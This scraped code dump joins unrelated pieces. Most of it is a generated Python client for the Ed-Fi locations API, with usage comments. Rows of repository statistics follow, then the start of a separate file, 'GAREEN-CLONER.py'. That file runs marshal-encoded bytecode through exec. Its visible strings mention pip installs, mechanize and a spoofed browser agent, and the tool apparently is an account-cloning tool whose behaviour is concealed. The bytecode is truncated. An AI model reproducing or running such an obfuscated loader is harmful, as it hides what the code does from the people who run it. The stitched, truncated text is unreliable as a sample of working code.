The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_locations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deletes_locations" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_locations`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_locations`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/deletes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EdFiLocation]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
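# --- Editorial usage sketch (not part of the generated client) -------------
# The DELETES operation above pages tombstoned resources by ChangeVersion for
# incremental synchronization; the window below is hypothetical, and limit is
# validated by the client to the 0..500 range.
#
#     removed = LocationsApi().deletes_locations(
#         min_change_version=1000, max_change_version=2000, limit=100)
#     for location in removed:
#         print(location.id)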
def get_locations(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str classroom_identification_code: A unique number or alphanumeric code assigned to a room by a school, school system, state, or other agency or entity.
:param int school_id: The identifier assigned to a school.
:param str id:
:param int maximum_number_of_seats: The maximum number of seats the class can maintain.
:param int optimal_number_of_seats: The number of seats that is most favorable to the class.
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_locations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_locations_with_http_info(**kwargs) # noqa: E501
return data
def get_locations_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str classroom_identification_code: A unique number or alphanumeric code assigned to a room by a school, school system, state, or other agency or entity.
:param int school_id: The identifier assigned to a school.
:param str id:
:param int maximum_number_of_seats: The maximum number of seats the class can maintain.
:param int optimal_number_of_seats: The number of seats that is most favorable to the class.
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'total_count', 'classroom_identification_code', 'school_id', 'id', 'maximum_number_of_seats', 'optimal_number_of_seats'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_locations" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_locations`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_locations`, must be a value greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and ('classroom_identification_code' in params and
len(params['classroom_identification_code']) > 60):
raise ValueError("Invalid value for parameter `classroom_identification_code` when calling `get_locations`, length must be less than or equal to `60`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
if 'total_count' in params:
query_params.append(('totalCount', params['total_count'])) # noqa: E501
if 'classroom_identification_code' in params:
query_params.append(('classroomIdentificationCode', params['classroom_identification_code'])) # noqa: E501
if 'school_id' in params:
query_params.append(('schoolId', params['school_id'])) # noqa: E501
if 'id' in params:
query_params.append(('id', params['id'])) # noqa: E501
if 'maximum_number_of_seats' in params:
query_params.append(('maximumNumberOfSeats', params['maximum_number_of_seats'])) # noqa: E501
if 'optimal_number_of_seats' in params:
query_params.append(('optimalNumberOfSeats', params['optimal_number_of_seats'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EdFiLocation]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
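# --- Editorial usage sketch (not part of the generated client) -------------
# "Get"-pattern searches combine any of the query parameters documented above.
# A hedged paging loop for a hypothetical school_id, fetching 100 rows per
# request until an empty page comes back.
#
#     api = LocationsApi()
#     offset, page_size = 0, 100
#     while True:
#         page = api.get_locations(school_id=255901001,
#                                  limit=page_size, offset=offset)
#         if not page:
#             break
#         offset += page_size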
def get_locations_by_id(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:return: EdFiLocation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_locations_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_locations_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_locations_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:return: EdFiLocation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_none_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_locations_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_locations_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_none_match' in params:
header_params['If-None-Match'] = params['if_none_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EdFiLocation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
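# --- Editorial usage sketch (not part of the generated client) -------------
# Conditional "Get By Id": replaying the ETag from an earlier response via
# if_none_match lets the server answer 304 Not Modified instead of resending
# an unchanged resource. The identifier and ETag below are placeholders.
#
#     location = LocationsApi().get_locations_by_id(
#         "abc123", if_none_match='"5250159503"')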
def post_location(self, location, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error (you must use a PUT operation to update a resource by \"id\"). The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_location(location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_location_with_http_info(location, **kwargs) # noqa: E501
else:
(data) = self.post_location_with_http_info(location, **kwargs) # noqa: E501
return data
def post_location_with_http_info(self, location, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error (you must use a PUT operation to update a resource by \"id\"). The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_location_with_http_info(location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_location" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location' is set
if self.api_client.client_side_validation and ('location' not in params or
params['location'] is None): # noqa: E501
raise ValueError("Missing the required parameter `location` when calling `post_location`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'location' in params:
body_params = params['location']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
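# --- Editorial usage sketch (not part of the generated client) -------------
# POST is an upsert keyed on the resource's natural key values (for Location,
# typically the school reference plus classroomIdentificationCode), so the
# body must omit "id". The dict below is a hypothetical EdFiLocation payload.
#
#     LocationsApi().post_location({
#         "schoolReference": {"schoolId": 255901001},
#         "classroomIdentificationCode": "RM-101",
#         "maximumNumberOfSeats": 30,
#     })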
def put_location(self, id, location, **kwargs): # noqa: E501
"""Updates or creates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update or create a resource by identifier. If the resource doesn't exist, the resource will be created using that identifier. Additionally, natural key values cannot be changed using this operation, and will not be modified in the database. If the resource \"id\" is provided in the JSON body, it will be ignored as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_location(id, location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_location_with_http_info(id, location, **kwargs) # noqa: E501
else:
(data) = self.put_location_with_http_info(id, location, **kwargs) # noqa: E501
return data
def put_location_with_http_info(self, id, location, **kwargs): # noqa: E501
"""Updates or creates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update or create a resource by identifier. If the resource doesn't exist, the resource will be created using that identifier. Additionally, natural key values cannot be changed using this operation, and will not be modified in the database. If the resource \"id\" is provided in the JSON body, it will be ignored as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_location_with_http_info(id, location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'location', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_location" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `put_location`") # noqa: E501
# verify the required parameter 'location' is set
if self.api_client.client_side_validation and ('location' not in params or
params['location'] is None): # noqa: E501
raise ValueError("Missing the required parameter `location` when calling `put_location`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'location' in params:
body_params = params['location']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
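# --- Editorial end-to-end sketch (not part of the generated client) --------
# Hedged wiring of the usual swagger-codegen pieces, assuming a bearer token
# has already been obtained from the ODS / API token endpoint; the host URL
# and token strings are placeholders, not values from this repository.
#
#     from swagger_client.configuration import Configuration
#     from swagger_client.api_client import ApiClient
#
#     config = Configuration()
#     config.host = "https://example.org/v5.1/api/data/v3"       # hypothetical
#     config.access_token = "REPLACE_WITH_BEARER_TOKEN"          # hypothetical
#     api = LocationsApi(ApiClient(configuration=config))
#     print(api.get_locations(limit=25))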
| 50.018571
| 493
| 0.643789
| 4,334
| 35,013
| 5.013152
| 0.076142
| 0.045657
| 0.01795
| 0.019883
| 0.939522
| 0.92797
| 0.918627
| 0.910894
| 0.904589
| 0.901873
| 0
| 0.015927
| 0.273727
| 35,013
| 699
| 494
| 50.090129
| 0.838491
| 0.429069
| 0
| 0.77748
| 0
| 0.013405
| 0.219837
| 0.056467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034853
| false
| 0
| 0.010724
| 0
| 0.096515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 | 1683d311fd97d76cbce691765d75d8fa12cdca23 | 103,445 | py | Python | GAREEN-CLONER.py | CLB-09/GAREEN-TOOLS | 1d9349c835294329a2b140f1df21b95a509d7128 | ["Apache-2.0"] | null | null | null | GAREEN-CLONER.py | CLB-09/GAREEN-TOOLS | 1d9349c835294329a2b140f1df21b95a509d7128 | ["Apache-2.0"] | null | null | null | GAREEN-CLONER.py | CLB-09/GAREEN-TOOLS | 1d9349c835294329a2b140f1df21b95a509d7128 | ["Apache-2.0"] | null | null | null |
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sg\x04\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x02\x00l\t\x00m\n\x00Z\x0b\x00\x01d\x00\x00d\x03\x00l\x0c\x00m\r\x00Z\r\x00\x01d\x00\x00d\x01\x00l\x0e\x00Z\x0e\x00y\x10\x00d\x00\x00d\x01\x00l\x0f\x00Z\x0f\x00Wn-\x00\x04e\x10\x00k\n\x00r\xd7\x00\x01\x01\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x05\x00GHe\x06\x00j\x12\x00\x83\x00\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x13\x00Z\x13\x00Wn-\x00\x04e\x10\x00k\n\x00r\x17\x01\x01\x01\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x06\x00GHe\x06\x00j\x12\x00\x83\x00\x00\x01n\x01\x00Xg\x00\x00Z\x14\x00d\x07\x00a\x15\x00g\x00\x00Z\x16\x00g\x00\x00Z\x17\x00g\x00\x00Z\x18\x00g\x00\x00Z\x19\x00e\x1a\x00e\x06\x00\x83\x01\x00\x01e\x06\x00j\x1b\x00d\x08\x00\x83\x01\x00\x01e\x13\x00j\x1c\x00\x83\x00\x00Z\x1d\x00e\x1d\x00j\x1e\x00e\x1f\x00\x83\x01\x00\x01e\x1d\x00j \x00e!\x00\x83\x01\x00\x01e\x1d\x00j"\x00e!\x00\x83\x01\x00\x01e\x1d\x00j#\x00e\x07\x00j$\x00\x83\x00\x00\x83\x01\x00\x01e\x1d\x00j%\x00e!\x00\x83\x01\x00\x01e\x1d\x00j&\x00e\x13\x00j\'\x00j(\x00\x83\x00\x00d\t\x00d\n\x00\x83\x01\x01\x01d@\x00g\x01\x00e\x1d\x00_)\x00y\x14\x00d\x00\x00d\r\x00l*\x00m+\x00Z+\x00\x01Wn-\x00\x04e\x10\x00k\n\x00r\x11\x02\x01\x01\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x0e\x00GHe\x06\x00j\x12\x00\x83\x00\x00\x01n\x01\x00Xe+\x00d\x0f\x00d\x10\x00d\x11\x00\x83\x01\x01Z,\x00xD\x00e-\x00d\x11\x00\x83\x01\x00D]6\x00Z.\x00e,\x00j/\x00\x83\x00\x00\x01e\x0b\x00d\x12\x00\x83\x01\x00\x01e\x01\x00j\x11\x00d\x04\x00\x83\x01\x00\x01d\x13\x00GHe,\x00j0\x00\x83\x00\x00\x01q1\x02Wd\x07\x00d\x14\x00\x84\x01\x00Z1\x00d\x15\x00\x84\x00\x00Z2\x00d\x16\x00\x84\x00\x00Z3\x00d\x17\x00\x84\x00\x00Z4\x00d\x18\x00\x84\x00\x00Z5\x00d\x19\x00\x84\x00\x00Z6\x00d\x1a\x00\x84\x00\x00Z7\x00d\x1b\x00\x84\x00\x00Z8\x00d\x1c\x00\x84\x00\x00Z9\x00d\x1d\x00\x84\x00\x00Z:\x00d\x1e\x00\x84\x00\x00Z;\x00d\x1f\x00\x84\x00\x00Z<\x00d \x00\x84\x00\x00Z=\x00d!\x00e\x02\x00j>\x00f\x01\x00d"\x00\x84\x00\x00\x83\x00\x00YZ?\x00d#\x00\x84\x00\x00Z@\x00d$\x00\x84\x00\x00ZA\x00d%\x00\x84\x00\x00ZB\x00d&\x00\x84\x00\x00aC\x00d\'\x00\x84\x00\x00ZD\x00d(\x00\x84\x00\x00ZE\x00d)\x00\x84\x00\x00ZF\x00d*\x00\x84\x00\x00ZG\x00d+\x00\x84\x00\x00ZH\x00d,\x00\x84\x00\x00ZI\x00d-\x00\x84\x00\x00ZJ\x00d.\x00\x84\x00\x00ZK\x00d/\x00\x84\x00\x00ZL\x00d0\x00\x84\x00\x00ZM\x00d1\x00\x84\x00\x00ZN\x00d2\x00\x84\x00\x00ZO\x00d3\x00\x84\x00\x00ZP\x00d4\x00\x84\x00\x00ZQ\x00d5\x00\x84\x00\x00ZR\x00d6\x00\x84\x00\x00ZS\x00d7\x00\x84\x00\x00ZT\x00d8\x00\x84\x00\x00ZU\x00d9\x00\x84\x00\x00ZV\x00e5\x00\x83\x00\x00\x01d:\x00GHd;\x00eW\x00eX\x00tY\x00\x83\x01\x00\x83\x01\x00\x17GHx\x17\x00tY\x00D]\x0f\x00ZZ\x00d<\x00eZ\x00\x17GHq\xf3\x03Wd=\x00eW\x00eX\x00t[\x00\x83\x01\x00\x83\x01\x00\x17GHx\x17\x00t[\x00D]\x0f\x00Z\\\x00d>\x00e\\\x00\x17GHq"\x04Wd?\x00eW\x00eX\x00t]\x00\x83\x01\x00\x83\x01\x00\x17GHe\x06\x00j^\x00j_\x00\x83\x00\x00\x01d:\x00GHe3\x00\x83\x00\x00\x01d\x01\x00S(A\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00sleep(\x01\x00\x00\x00t\x04\x00\x00\x00datet\x05\x00\x00\x00resets&\x00\x00\x00\x1b[1;92mpip2 install -r nganunymous.txts\x1d\x00\x00\x00\x1b[1;92mpip2 install 
mechanizei\x00\x00\x00\x00t\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(\x01\x00\x00\x00t\x03\x00\x00\x00Bars\x1c\x00\x00\x00\x1b[1;92mpip2 install progresss\x16\x00\x00\x00\r\x1b[1;91mProsess\x1b[1;97mt\x03\x00\x00\x00maxi2\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xb9?s\x11\x00\x00\x00\x1b[1;92mLoading...c\x02\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x80\x00\x00\x00xy\x00y\x14\x00t\x00\x00d\x01\x00|\x00\x00\x16\x83\x01\x00}\x02\x00Wn\x19\x00\x01\x01\x01d\x02\x00GHt\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01n\x01\x00X|\x01\x00rZ\x00|\x02\x00j\x04\x00\x83\x00\x00|\x01\x00k\x06\x00rO\x00Pqx\x00d\x03\x00GHq\x03\x00q\x03\x00t\x05\x00|\x02\x00\x83\x01\x00d\x04\x00k\x02\x00rw\x00d\x03\x00GHq\x03\x00q\x03\x00Pq\x03\x00W|\x02\x00S(\x05\x00\x00\x00Ns\x17\x00\x00\x00\x1b[32;1m%s\x1b[31;1m\x1b[1;97ms\x10\x00\x00\x00\x1b[1;91m[!] Errors\x13\x00\x00\x00\x1b[1;91m[!] Masukkani\x00\x00\x00\x00(\x06\x00\x00\x00t\t\x00\x00\x00raw_inputt\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exitt\x05\x00\x00\x00uppert\x03\x00\x00\x00len(\x03\x00\x00\x00t\x01\x00\x00\x00xt\x01\x00\x00\x00qt\x01\x00\x00\x00s(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00inputT6\x00\x00\x00s \x00\x00\x00\x00\x01\x03\x01\x03\x01\x14\x01\x03\x01\x05\x01\x11\x01\x06\x01\x12\x01\x04\x02\x05\x01\x06\x02\x12\x01\x05\x01\x06\x02\x05\x01c\x02\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sH\x00\x00\x00xA\x00y\x16\x00t\x00\x00t\x01\x00|\x00\x00\x83\x01\x00\x83\x01\x00}\x02\x00Wn\x0f\x00\x01\x01\x01d\x01\x00GHq\x03\x00n\x01\x00X|\x02\x00|\x01\x00k\x06\x00r;\x00Pq\x03\x00d\x02\x00GHq\x03\x00W|\x02\x00S(\x03\x00\x00\x00Ns\x1b\x00\x00\x00\x1b[1;91m[!] Tidak Ditemukan.s\x1a\x00\x00\x00\x1b[1;91m[!] Tidak Ditemukan(\x02\x00\x00\x00t\x03\x00\x00\x00intR\x10\x00\x00\x00(\x03\x00\x00\x00R\r\x00\x00\x00t\x01\x00\x00\x00tt\x03\x00\x00\x00idn(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00inputSK\x00\x00\x00s\x14\x00\x00\x00\x00\x01\x03\x01\x03\x01\x16\x01\x03\x01\x05\x01\x07\x01\x0c\x01\x04\x02\t\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s#\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01t\x00\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x03\x00\x00\x00Ns\x1a\x00\x00\x00\x1b[1;91m[!] 
